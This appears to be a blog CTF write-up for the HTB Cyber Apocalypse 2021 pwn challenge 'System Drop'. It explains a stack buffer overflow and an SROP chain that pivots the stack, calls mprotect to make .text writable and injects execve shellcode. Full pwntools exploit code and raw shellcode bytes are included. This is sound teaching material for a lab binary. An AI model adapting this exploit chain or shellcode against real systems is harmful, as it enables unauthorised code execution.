<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      System Drop
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="System Drop" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="***************************************** ********************************************* ********************************************** ***** ******* **** ****** **** ****** ****** ******** ********************************************** **** ****** ******* *** ***** ********* **** ****** ************ ********************************************** ************** ********************************************** **************** **** ****** *** **** *** ***** **** **** **** ******* ***** ***** ******************************************** ******* ******* ****************************************** ******** ******** ***************************************** ********* ********* **************************************** ********** *********** *********************** *********** ************ ************* ********************* ********** ************* ************** ******************** ********** ************** *************** ********************* *********** **************** **************** ********************************** ***************** ***************** ********************************* ****************** ******************* ******************************** ******************* ********************* ******************************* ********************* *********************** ****************************** ********************** *********************** ***************************** ********************** *********************** *************************** ********************** *********************** ************************** *********************** ************************ ************************* ************************* ************************* ************************* ************************** *************************** ************************ *************************** ***************************** ************************* ********************************************************** ************************* ************************** *************************** *****************************" />
<meta property="og:description" content="***************************************** ********************************************* ********************************************** ***** ******* **** ****** **** ****** ****** ******** ********************************************** **** ****** ******* *** ***** ********* **** ****** ************ ********************************************** ************** ********************************************** **************** **** ****** *** **** *** ***** **** **** **** ******* ***** ***** ******************************************** ******* ******* ****************************************** ******** ******** ***************************************** ********* ********* **************************************** ********** *********** *********************** *********** ************ ************* ********************* ********** ************* ************** ******************** ********** ************** *************** ********************* *********** **************** **************** ********************************** ***************** ***************** ********************************* ****************** ******************* ******************************** ******************* ********************* ******************************* ********************* *********************** ****************************** ********************** *********************** ***************************** ********************** *********************** *************************** ********************** *********************** ************************** *********************** ************************ ************************* ************************* ************************* ************************* ************************** *************************** ************************ *************************** ***************************** ************************* ********************************************************** ************************* ************************** *************************** *****************************" />
<link rel="canonical" href="http://0.0.0.0:4000/2021/04/25/system-drop.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2021/04/25/system-drop.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-04-25T00:00:00+02:00" />
<script type="application/ld+json">
{"headline":"System Drop","url":"http://0.0.0.0:4000/2021/04/25/system-drop.html","datePublished":"2021-04-25T00:00:00+02:00","dateModified":"2021-04-25T00:00:00+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2021/04/25/system-drop.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":"***************************************** ********************************************* ********************************************** ***** ******* **** ****** **** ****** ****** ******** ********************************************** **** ****** ******* *** ***** ********* **** ****** ************ ********************************************** ************** ********************************************** **************** **** ****** *** **** *** ***** **** **** **** ******* ***** ***** ******************************************** ******* ******* ****************************************** ******** ******** ***************************************** ********* ********* **************************************** ********** *********** *********************** *********** ************ ************* ********************* ********** ************* ************** ******************** ********** ************** *************** ********************* *********** **************** **************** ********************************** ***************** ***************** ********************************* ****************** ******************* ******************************** ******************* ********************* ******************************* ********************* *********************** ****************************** ********************** *********************** ***************************** ********************** *********************** *************************** ********************** *********************** ************************** *********************** ************************ ************************* ************************* ************************* ************************* ************************** *************************** ************************ *************************** ***************************** ************************* ********************************************************** ************************* ************************** *************************** *****************************","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 0.5vw; text-align: center">
                                                      *****************************************     
                                                    *********************************************   
                                                    **********************************************  
                                                    *****                                  *******  
                                                    ****                                    ******  
                                                    ****                                    ******  
                                                    ******                                ********  
                                                    **********************************************  
                                                    ****                                    ******  
                               *******              ***                                      *****  
                              *********             ****                                    ******  
                            ************            **********************************************  
                           **************           **********************************************  
                          ****************          ****                                    ******  
                         ***            ****        ***                                      *****  
                        ****             ****        ****                                  *******  
                       *****             *****        ********************************************  
                     *******            *******         ******************************************  
                    ********            ********         *****************************************  
                   *********            *********         ****************************************  
                  **********            ***********        ***********************     ***********  
                 ************           *************       *********************       **********  
                *************           **************       ********************       **********  
               **************           ***************       *********************    ***********  
             ****************           ****************        **********************************  
            *****************           *****************        *********************************  
           ******************          *******************        ********************************  
          *******************          *********************       *******************************  
         *********************        ***********************       ******************************  
        **********************         ***********************       *****************************  
      **********************            ***********************        ***************************  
     **********************              ***********************        **************************  
    ***********************              ************************        *************************  
   *************************             *************************       *************************  
  **************************            ***************************       ************************  
   ***************************        *****************************      *************************  
      **********************************************************         *************************  
                                                                        **************************  
                                                                       ***************************  
                                                                    *****************************           
</pre>

<hr />

<p>This was a pwn challenge rated with 325 points at Cyber Apocalypse 2021 CTF from HTB.
I didn’t save the description of the chall but it said something about aliens.</p>

<p>They only provide a binary.</p>

<hr />

<h2 id="first-look">First look</h2>

<p>The first thing we notice when we open it is how small it is. Only a main function that calls <code class="language-plaintext highlighter-rouge">alarm</code> and <code class="language-plaintext highlighter-rouge">read</code>. There is an obvious buffer overflow because we read 0x100 bytes and the stack only expects 0x20 bytes.</p>

<p><img src="/./assets/imgs/main-drop.png" alt="main" /></p>

<p>Let’s check the security of the binary:</p>

<p><img src="/./assets/imgs/security-drop.png" alt="Security" /></p>

<p>No canary (we already saw that in the <code class="language-plaintext highlighter-rouge">main</code> function), no PIC and NX bit.</p>

<p>So we have a very very small program (that means less ROP possibilities), that allows us to store a big amount of data into the stack and that’s it.</p>

<p>The name of the challenge give us a clue but the real clue comes in the fact that a function called <code class="language-plaintext highlighter-rouge">sym._syscall</code> is loaded. The contents are:</p>

<pre><code class="language-assembly">push rbp
mov rbp, rsp
syscall
ret
</code></pre>

<p>This is clearly an SROP. We can store more than 248 bytes (which is the size of the frame) and we have a syscall available. Let’s do this.</p>

<h2 id="f">F</h2>

<p>To trigger the <code class="language-plaintext highlighter-rouge">sigreturn</code> syscall we only need to set the <code class="language-plaintext highlighter-rouge">rax</code> register to 15 or 0xf and then call the <code class="language-plaintext highlighter-rouge">syscall</code> function with the frame in the stack.</p>

<p>Then, we can set all the registers to make the <code class="language-plaintext highlighter-rouge">.text</code> section writable by calling the <code class="language-plaintext highlighter-rouge">memprotect</code> syscall, redirect to main and write on the <code class="language-plaintext highlighter-rouge">.text</code> section whatever shellcode we want.</p>

<p>Let’s search for a ROP gadget that allow us to set the <code class="language-plaintext highlighter-rouge">rax</code> register…none.</p>

<h2 id="the-long-road">The long road</h2>

<p>How else could we set the <code class="language-plaintext highlighter-rouge">rax</code> register? Well, it is used for something else.</p>

<p>It is used as the return value from functions. And the <code class="language-plaintext highlighter-rouge">read</code> function returns the amount of bytes read. So if we could read only 15 bytes, we could set the <code class="language-plaintext highlighter-rouge">rax</code> register.</p>

<p>But the ROP chain is going to be longer, obviously. Only the frame is 248 bytes.</p>

<p>And we have another problem, the frame is going to use 248 bytes and we can read 0x100 bytes or, in base 10, 256 bytes. We can only use 8 more bytes for the ROP. We definetly need more than 8 bytes.</p>

<p>On the first read we have to store the ROP chain but if we trigger a second read we have to say where to store the data so we should move the <code class="language-plaintext highlighter-rouge">rsp</code> pointer to somewhere we know.</p>

<p>Let’s make a list:</p>

<ol>
  <li>Store the ROP chain</li>
  <li>Move the <code class="language-plaintext highlighter-rouge">rsp</code> to a static address.</li>
  <li>Store the frame</li>
  <li>Read 15 bytes to set the <code class="language-plaintext highlighter-rouge">rax</code> register.</li>
  <li>Call the syscall.</li>
</ol>

<p>Well, we have a gadget we could use to move the <code class="language-plaintext highlighter-rouge">rsp</code> (I am using <a href="https://github.com/JonathanSalwan/ROPgadget">RopGadget</a> to get the gadgets) and also another for the <code class="language-plaintext highlighter-rouge">rsi</code> and <code class="language-plaintext highlighter-rouge">rdi</code> to set the parameters to the <code class="language-plaintext highlighter-rouge">read</code> function:</p>

<pre><code class="language-assembly">0x00000000004005cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004005d3 : pop rdi ; ret
0x00000000004005d1 : pop rsi ; pop r15 ; ret
0x0000000000400416 : ret
</code></pre>

<p>We could use the <code class="language-plaintext highlighter-rouge">.data</code> section to redirect the new <code class="language-plaintext highlighter-rouge">rsp</code> there.</p>

<h2 id="building-the-script">Building the script</h2>

<p>First, import <code class="language-plaintext highlighter-rouge">pwntools</code> and store all the addresses we need and the offset to the buffer overflow (0x20 + 8 for the <code class="language-plaintext highlighter-rouge">rbp</code>):</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">context</span><span class="p">.</span><span class="nf">clear</span><span class="p">(</span><span class="n">arch</span><span class="o">=</span><span class="sh">"</span><span class="s">amd64</span><span class="sh">"</span><span class="p">)</span>

<span class="n">offset</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x28</span>
<span class="n">data_address</span> <span class="o">=</span> <span class="mh">0x00601028</span>
<span class="n">read_address</span> <span class="o">=</span> <span class="mh">0x00400440</span>
<span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x00000000004005d3</span>
<span class="n">pop_rsi</span> <span class="o">=</span> <span class="mh">0x00000000004005d1</span>
<span class="n">pop_rsp</span> <span class="o">=</span> <span class="mh">0x00000000004005cd</span>
<span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x0040053b</span>
<span class="n">main</span> <span class="o">=</span> <span class="mh">0x00400541</span>
</code></pre></div></div>

<p>In the first read we are going to store the next part of the ROP in the <code class="language-plaintext highlighter-rouge">.data</code> section:</p>

<blockquote>
  <p>Notice: the read function reads as much data as stated in the argument or if the buffer holds less than that, as much as it is. This means that we have to fill the buffer with the amount of data read (0x100) so we avoid the function reading more than we want.</p>
</blockquote>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">first_read</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsi</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">data_address</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">read_address</span><span class="p">)</span>
<span class="n">redirect_rsp</span> <span class="o">=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsp</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">data_address</span> <span class="o">-</span> <span class="mi">8</span> <span class="o">*</span> <span class="mi">3</span><span class="p">)</span> 

<span class="n">p</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">first_read</span> <span class="o">+</span> <span class="n">redirect_rsp</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">first_read</span> <span class="o">+</span> <span class="n">redirect_rsp</span> <span class="p">)))</span>
</code></pre></div></div>

<p>Perfect, now we send the second part of the ROP: another read for the frame, another one for the 0xf in <code class="language-plaintext highlighter-rouge">rax</code> and finally the call to <code class="language-plaintext highlighter-rouge">syscall</code></p>

<blockquote>
  <p>I added a bunch of ret just in case it was an ubuntu 18.04 with the movaps issue</p>
</blockquote>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">second_read</span> <span class="o">=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsi</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">data_address</span> <span class="o">+</span> <span class="mi">8</span> <span class="o">*</span> <span class="mi">15</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">read_address</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsi</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">data_address</span> <span class="o">+</span> <span class="mi">900</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">read_address</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">syscall</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">second_read</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">second_read</span><span class="p">))))</span>
</code></pre></div></div>

<p>Perfect, let’s send the frame and then the 0xf bytes with the main address so we can return after the <code class="language-plaintext highlighter-rouge">mprotect</code>. I’m using 0x400000 because of what the manual says about mprotect:</p>

<blockquote>
  <p>The implementation may require that addr be a multiple of the page size as returned by sysconf()</p>
</blockquote>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">frame</span> <span class="o">=</span> <span class="nc">SigreturnFrame</span><span class="p">(</span><span class="n">kernel</span><span class="o">=</span><span class="sh">"</span><span class="s">amd64</span><span class="sh">"</span><span class="p">)</span>
<span class="n">frame</span><span class="p">.</span><span class="n">rax</span> <span class="o">=</span> <span class="mi">10</span> <span class="c1"># mprotect syscall
</span><span class="n">frame</span><span class="p">.</span><span class="n">rdi</span> <span class="o">=</span> <span class="mh">0x00400000</span> <span class="c1"># base address
</span><span class="n">frame</span><span class="p">.</span><span class="n">rsi</span> <span class="o">=</span> <span class="mi">200</span> <span class="c1"># size
</span><span class="n">frame</span><span class="p">.</span><span class="n">rdx</span> <span class="o">=</span> <span class="mi">7</span> <span class="c1"># permission RDX
</span><span class="n">frame</span><span class="p">.</span><span class="n">rsp</span> <span class="o">=</span> <span class="n">data_address</span> <span class="o">+</span> <span class="mi">900</span> <span class="c1"># where the main address will be
</span><span class="n">frame</span><span class="p">.</span><span class="n">rip</span> <span class="o">=</span> <span class="n">syscall</span>  

<span class="n">p</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nf">bytes</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">frame</span><span class="p">)))</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="nf">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="s">XXXXXX</span><span class="sh">'</span><span class="p">)</span>
<span class="nf">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>

<blockquote>
  <p>We are adding a sleep of 2 seconds because now we can’t send the whole 0x100 bytes to fill the buffer. It is a dirty trick but it works.</p>
</blockquote>

<p>Now we are back in the main with the <code class="language-plaintext highlighter-rouge">.text</code> section writable. Let’s write a basic shellcode there to pop a shell. Same as before, ROP to write our input to the <code class="language-plaintext highlighter-rouge">main</code> function and redirect to that address:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">shellcode</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05</span><span class="sh">"</span>

<span class="n">first_read</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsi</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00400570</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">read_address</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00400570</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">first_read</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x00</span><span class="sh">"</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">first_read</span><span class="p">)))</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p>And we got it!</p>

<p><img src="/./assets/imgs/flag-drop.png" alt="Flag" /></p>


        </div>
    </main>

    
    </body>
</html>